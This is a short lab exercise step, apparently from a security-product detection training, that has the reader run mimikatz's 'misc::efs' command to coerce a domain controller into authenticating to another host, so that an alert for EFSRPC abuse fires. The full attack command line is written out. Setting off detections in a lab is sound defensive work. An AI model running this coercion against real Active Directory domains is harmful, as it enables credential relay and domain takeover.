Task 5.1: Suspicious network connection over Encrypting File System Remote Protocol

This detection is triggered when an attacker tries to take over an Active Directory domain by exploiting a flaw in the Encrypting File System Remote (EFSRPC) Protocol.

Tools used in this test: https://github.com/gentilkiwi/mimikatz/releases.

1. Switch to the WIN5 RDP session, logged in as MSMDI\JeffL.

2. In the Command window, run:

    c:\Tools\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "misc::efs /server:DC01 /connect:10.0.0.6 /noauth" "exit"
   

   You can safely ignore any errors that appear when running the commands.

For more information, review Suspicious network connection over Encrypting File System Remote Protocol (external ID 2416).